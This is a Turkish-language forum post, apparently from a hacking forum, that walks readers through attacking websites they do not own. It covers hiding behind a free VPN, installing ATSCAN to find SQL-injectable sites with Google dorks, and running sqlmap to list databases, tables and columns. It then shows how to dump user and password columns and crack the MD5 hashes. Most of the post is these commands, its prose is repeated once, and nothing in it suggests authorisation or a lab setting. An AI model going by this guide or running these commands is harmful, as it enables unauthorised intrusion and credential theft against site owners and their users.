#Evet arkadaşlar bugün size en baştan başlayarak dork taraması yaparak açık bulunan siteye sızma ve verilerini çekmeyi anlatıcam.
#Bendeki Kali 2018.2 versiyonudur.
#Öncelikle böyle sızma işlemleri yaparken Vpn kullanmanızı şiddetle tavsiye ediyorum olur,olmaz demeyin her zaman işinizi sağlama alın.Neyse konuya geçiyorum ilk olarak ;
#Tarayıcımızı Açıp www.vpnbook.com Adresine Giriş Yapıyoruz Ardından OPENVPN Butonuna Kısmına Geçip Herhangi Birini İndiriyoruz.
#İndirdiğimiz Zip Dosyasını Açıyoruz.
#Daha sonra terminalı açıyoruz.Kodlarımız.
#İnen 4 tane dosyadan istediğinizi seçebilirsiniz.
#VPN'yi Kapatmak İçin Terminalde ctrl + c Tuşuna Basınız.
#Evet arkadaşlar ilk önce terminali açıyoruz.
yada
yazıyoruz.
#İndirdikten sonra zipten çıkarıyoruz.Tekrar terminale dönüyoruz.
#komutunu yazarak dosyaları görüyoruz.
#yazarak dosyaya giriyoruz.
#Arkadaşlar ben daha önce install.sh dosyasına izin verdiğim için bende yeşil gözüküyor.
#Yazarak yönetici izini veriyorsunuz.
daha sonra yazıyoruz ve kurulum başlıyor.Karşınıza y/n seçenekleri çıkacaktır.
#İlk 2 seçeneğe y yazıyoruz.
#Sonrakilere enterlayarak default olarak seçiyoruz.
#Daha sonra kurulum bittikten sonra karşınıza bir pencere açılcak.Burada dosyamız perl yazılım diliyle yazıldığı için terminala
yazıyoruz.
#Atscan'a girdikten sonra
#Yazarak yardım menüsünde yapabilceklerimizi gösteriyor.
#Yazarak bize sql açıklı siteleri tarıyacaktır.Burda bilmeniz gereken level 10 yazmamızın nedeni 10 tane açıklı site bulucak siz bunu 100 yaparsanız 100 site bulucaktır ama çok yazmayın google'dan ip ban yersiniz.
#Ben örnek olarak basit bir dork aratıcam siz kendiniz dork yazabilir veya elinizde daha fresh dorklar vardır bunları uygulayabilirsiniz.
#Evet arkadaşlar böyle linklerde yeşil çıkarsa o sitemizde açık vardır.
Ama eğer böyle ise o sitelerde sql açığı yoktur.
#Şimdi geçelim bulduğumuz açıklı sitenin verilerini çekmeye.
#İlk önce terminali açıyoruz.
yazıyoruz.
#Ve karşımıza dbler geliyor.
#Daha sonra yukarı ok tuşuna basarak aynı komutu getiriyoruz.
#Daha sonra aşağıdaki kodu yazıyoruz.Birden fazla tabloyu isterseniz araya "," koyun.
#Ve karşımıza columns'lar geldi.Buradan istediğimiz columns'ları seçiyoruz.
#Yazarak columnsları'da çekiyoruz.Benim bu örnek verdiğim site dilinden dolayı admin bilgilerine ulaşamadım ama siz bulduğunuz db'de user,pass columnslarını çektikten sonra size y/n gibi sorular sorucaktır bu sorularda passlar md5 olarak şifreli çıkıyor bunları kırmak istiyormusunuz diye soruyor "enterlayarak" default seçerek kırma işlemine başlar.
#Evet arkadaşlar bu yazımda ellmden geldiği kadar basit bir şekilde anlatmaya çalıştım eğer takılan olursa her zaman takıldığı yeri söylesin yardımcı olurum.Ve son olarak kelimeleri telaffuzda bir eksiklik yaptıysam affola ve çok saygı değer üstadlarım hatalarım varsa lütfen düzeltsin.
#Bendeki Kali 2018.2 versiyonudur.
#Öncelikle böyle sızma işlemleri yaparken Vpn kullanmanızı şiddetle tavsiye ediyorum olur,olmaz demeyin her zaman işinizi sağlama alın.Neyse konuya geçiyorum ilk olarak ;
Vpnbook
#Tarayıcımızı Açıp www.vpnbook.com Adresine Giriş Yapıyoruz Ardından OPENVPN Butonuna Kısmına Geçip Herhangi Birini İndiriyoruz.
#İndirdiğimiz Zip Dosyasını Açıyoruz.
#Daha sonra terminalı açıyoruz.Kodlarımız.
Kod:
cd Desktop
Kod:
ls
Kod:
openvpn "dosyaadı"#İnen 4 tane dosyadan istediğinizi seçebilirsiniz.
#VPN'yi Kapatmak İçin Terminalde ctrl + c Tuşuna Basınız.
Atscan
#Evet arkadaşlar ilk önce terminali açıyoruz.
Kod:
cd Desktop
Kod:
]cd Masaüstü
Kod:
git clone [url]https://github.com/AlisamTechnology/ATSCAN.git[/url]#İndirdikten sonra zipten çıkarıyoruz.Tekrar terminale dönüyoruz.
Kod:
ls
Kod:
cd ATSCAN-master#Arkadaşlar ben daha önce install.sh dosyasına izin verdiğim için bende yeşil gözüküyor.
Kod:
chmod +x install.sh
Kod:
./install.sh#İlk 2 seçeneğe y yazıyoruz.
#Sonrakilere enterlayarak default olarak seçiyoruz.
#Daha sonra kurulum bittikten sonra karşınıza bir pencere açılcak.Burada dosyamız perl yazılım diliyle yazıldığı için terminala
Kod:
perl atscan.pl#Atscan'a girdikten sonra
Kod:
atscan -h#Yazarak yardım menüsünde yapabilceklerimizi gösteriyor.
Kod:
perl atscan.pl -m 2 --dork "Dorkumuz" --level 10 --sql#Yazarak bize sql açıklı siteleri tarıyacaktır.Burda bilmeniz gereken level 10 yazmamızın nedeni 10 tane açıklı site bulucak siz bunu 100 yaparsanız 100 site bulucaktır ama çok yazmayın google'dan ip ban yersiniz.
#Ben örnek olarak basit bir dork aratıcam siz kendiniz dork yazabilir veya elinizde daha fresh dorklar vardır bunları uygulayabilirsiniz.
#Evet arkadaşlar böyle linklerde yeşil çıkarsa o sitemizde açık vardır.
Ama eğer böyle ise o sitelerde sql açığı yoktur.
#Şimdi geçelim bulduğumuz açıklı sitenin verilerini çekmeye.
Sqlmap
#İlk önce terminali açıyoruz.
Kod:
sqlmapyazıyoruz.
Kod:
sqlmap -h yazarak'ta bu araçla kullanabilceğimiz kod dizinlerini veriyor bize.
Kod:
sqlmap -u "sql açıklı site" --dbs komutunu yazarak db'sini istiyoruz#Ve karşımıza dbler geliyor.
#Daha sonra yukarı ok tuşuna basarak aynı komutu getiriyoruz.
Kod:
sqlmap -u "sql açıklı site" -D (Dbnin ismi) --tables yazarak tablolarını istiyoruz#Daha sonra aşağıdaki kodu yazıyoruz.Birden fazla tabloyu isterseniz araya "," koyun.
Kod:
sqlmap -u "sql açıklı site" -D (Dbnin ismi) -T (İstediğiniz tablonun ismi) --columns#Ve karşımıza columns'lar geldi.Buradan istediğimiz columns'ları seçiyoruz.
Kod:
sqlmap -u "sql açıklı site" -D (Dbnin ismi) -T (İstediğiniz tablonun ismi) -C (istediğimiz columns) --dump#Yazarak columnsları'da çekiyoruz.Benim bu örnek verdiğim site dilinden dolayı admin bilgilerine ulaşamadım ama siz bulduğunuz db'de user,pass columnslarını çektikten sonra size y/n gibi sorular sorucaktır bu sorularda passlar md5 olarak şifreli çıkıyor bunları kırmak istiyormusunuz diye soruyor "enterlayarak" default seçerek kırma işlemine başlar.
#Evet arkadaşlar bu yazımda ellmden geldiği kadar basit bir şekilde anlatmaya çalıştım eğer takılan olursa her zaman takıldığı yeri söylesin yardımcı olurum.Ve son olarak kelimeleri telaffuzda bir eksiklik yaptıysam affola ve çok saygı değer üstadlarım hatalarım varsa lütfen düzeltsin.
Moderatör tarafında düzenlendi:
